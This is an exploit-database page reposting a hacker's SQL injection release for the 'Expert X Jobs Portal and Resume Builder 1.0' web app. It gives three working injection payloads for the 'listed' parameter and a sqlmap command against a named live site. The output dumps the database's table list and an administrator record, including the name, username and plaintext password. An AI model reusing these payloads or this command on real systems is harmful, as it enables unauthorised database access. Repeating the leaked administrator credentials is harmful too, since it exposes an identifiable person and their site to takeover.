Advertisement






Expert X Jobs Portal And Resume Builder 1.0 SQL Injection

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2022-07-26
CPE
cpe:cpe:/a:jobs_portal_and_resume_builder:1.0
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070069

Below is a copy:

Expert X Jobs Portal And Resume Builder 1.0 SQL Injection
                                     C r a C k E r                                    
                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  


               From The Ashes and Dust Rises An Unimaginable crack....          

                                       [ Exploits ]                                   

:  Author   : CraCkEr                                                                  :
  Website  : wvidesk.com                                                              
  Vendor   : WVIDesk                                                                  
  Software : Expert X - Jobs Portal and       Expert X can manage jobs, courses,      
             Resume Builder v. 1.0            events and scholarships.                
  Vuln Type: Remote SQL Injection                                                     
  Method   : GET                                                                      
  Impact   : Database Access                                                          
                                                                                      
 
                              B4nks-NET irc.b4nks.tk #unix                             

:                                                                                        :
  Release Notes:                                                                        
                                                                           
  Typically used for remotely exploitable vulnerabilities that can lead to              
  system compromise.                                                                    
                                                                                        

                                                                                      


Greets:
       Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
   loool, DevS, Dark-Gost, Carlos132sp, ProGenius 
       CryptoJob (Twitter) twitter.com/CryptozJob

                                      CraCkEr 2022                                   



GET parameter 'listed' is vulnerable.

---
Parameter: listed (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: listed=1' AND 6926=6926 AND 'ZFlv'='ZFlv

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: listed=1' AND (SELECT 6137 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(SELECT (ELT(6137=6137,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NsfD'='NsfD

    Type: time-based blind
    Title: MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)
    Payload: listed=1' OR 8793=BENCHMARK(5000000,MD5(0x6643566c))#
---

[+] Starting the Attack

sqlmap.py -u "http://expert.wvidesk.com/companies?listed=1" --current-db --batch --random-agent

[INFO] the back-end DBMS is MySQL
web application technology: PHP, Apache, PHP 5.6.40
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:03:36] [INFO] fetching current database
[23:03:36] [INFO] retrieved: 'livexzfv_jobdreamers'
current database: 'livexzfv_jobdreamers'


fetching tables for database: 'livexzfv_jobdreamers'

Database: livexzfv_jobdreamers
[56 tables]
+---------------------+
| adminMenu           |
| applyajob           |
| candidatefeedback   |
| candidatelogin      |
| candidateview       |
| clickcount          |
| controlall          |
| controlcategory     |
| coursecategory      |
| courseinstitute     |
| coursevisitsite     |
| eventcategory       |
| eventtype           |
| jobagentcountry     |
| jobalert            |
| jobcategory         |
| jobcity             |
| jobcompanyinfo      |
| jobcontinent        |
| jobcountry          |
| jobeducationsubject |
| jobindustry         |
| jobmessage          |
| jobpostingprice     |
| jobquestion         |
| jobseniority        |
| jobuniversity       |
| jobusermaster       |
| jobusertype         |
| jobvisitsite        |
| mainmenu            |
| postacourse         |
| postaevent          |
| postajob            |
| postascholarship    |
| resumeaward         |
| resumecarsum        |
| resumecertificate   |
| resumecomment       |
| resumeeducation     |
| resumelanguage      |
| resumeprofessional  |
| resumepublication   |
| resumeresearch      |
| resumeskill         |
| resumesumexp        |
| resumetraining      |
| resumework          |
| scholarshipperiod   |
| seeker_profile      |
| seekers_admin       |
| siteAdmin           |
| siteadminuser       |
| tbl_countries       |
| tblpage             |
| userrole            |
+---------------------+

fetching columns for table 'siteadminuser' in database 'livexzfv_jobdreamers'

Database: livexzfv_jobdreamers
Table: siteadminuser
[8 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| aflag    | varchar(2)   |
| desig    | varchar(200) |
| enet     | varchar(450) |
| fullname | varchar(450) |
| id       | int(10)      |
| pw       | varchar(25)  |
| role     | int(10)      |
| users    | varchar(200) |
+----------+--------------+


fetching entries of column(s) 'aflag,desig,enet,fullname,id,pw,role,users' for table 'siteadminuser' in database 'livexzfv_jobdreamers'


Database: livexzfv_jobdreamers
Table: siteadminuser
[1 entry]
+-------+------------+--------------------+------------------------+----+------+------+-------+
| aflag | desig      | enet               | fullname               | id | pw   | role | users |
+-------+------------+--------------------+------------------------+----+------+------+-------+
| Y     | Site Admin | [email protected] | Mohammad Alamgir Kabir | 1  | 5664 | 1    | Kabir |
+-------+------------+--------------------+------------------------+----+------+------+-------+


[-] Done

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.